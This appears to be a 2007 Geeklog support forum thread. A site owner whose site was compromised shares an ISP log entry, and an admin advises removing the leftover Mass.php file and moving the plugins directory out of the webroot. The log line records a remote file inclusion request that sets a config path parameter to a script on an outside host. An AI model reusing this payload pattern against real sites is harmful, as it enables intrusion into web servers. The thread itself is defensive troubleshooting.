Welcome to Geeklog, Anonymous Sunday, December 22 2024 @ 09:38 pm EST
Geeklog Forums
Security Flaw in 1.4.1 or did I not upgrade correctly?
Lex
Anonymous
After my site was hacked up I upgraded to 1.4.1 last night.
My ISP contacted me this morning saying there are still successful hacks. From my ISP...
Here is the log entry I mentioned on the phone. This looks like the
most recent successful hack:
79.114.68.8 - - [12/Dec/2007:11:19:08 -0500] "GET
/plugins/spamx/Mass.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CON
F[path]=http://w
ww.estudiosmultimedia.com/images/jejek.txt? HTTP/1.1" 200 631
www.club80s.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
.NET
CLR 1.1.4322; .NET CLR 2.0.50727)" "-"
My ISP contacted me this morning saying there are still successful hacks. From my ISP...
Here is the log entry I mentioned on the phone. This looks like the
most recent successful hack:
79.114.68.8 - - [12/Dec/2007:11:19:08 -0500] "GET
/plugins/spamx/Mass.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CON
F[path]=http://w
ww.estudiosmultimedia.com/images/jejek.txt? HTTP/1.1" 200 631
www.club80s.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
.NET
CLR 1.1.4322; .NET CLR 2.0.50727)" "-"
10
9
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Do you have a file /plugins/spamx/Mass.php? You shouldn't. And that directory shouldn't be in your webroot or at least should be password-protected.
FWIW, we have hundreds of these hacking attempts every day, but if you have your plugins directory outside of the webroot or password-protect it, they won't do anything.
"Mass.php" is not part of Geeklog, so if you have such a file, it may be a leftover from the hack. In which case you should remove it ASAP.
Also see this thread for someone with a similar problem.
bye, Dirk
FWIW, we have hundreds of these hacking attempts every day, but if you have your plugins directory outside of the webroot or password-protect it, they won't do anything.
"Mass.php" is not part of Geeklog, so if you have such a file, it may be a leftover from the hack. In which case you should remove it ASAP.
Also see this thread for someone with a similar problem.
bye, Dirk
9
12
Quote
Lex
Anonymous
I was unaware that the plugins directory was supposed to be outside the webroot. I've been running it for years inside. Is that a common mistake that other people make or am I the only only one?
9
9
Quote
Status: offline
jmucchiello
Forum User
Full Member
Registered: 08/29/05
Posts: 985
Only public_html is supposed to be inside the webroot.
6
9
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: Lex
I was unaware that the plugins directory was supposed to be outside the webroot.
That has always been our recommendation. Unfortunately, popular autoinstallers like Fantastico have been doing it wrong from day 1 without our knowledge.
bye, Dirk
24
9
Quote
All times are EST. The time is now 09:38 pm.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content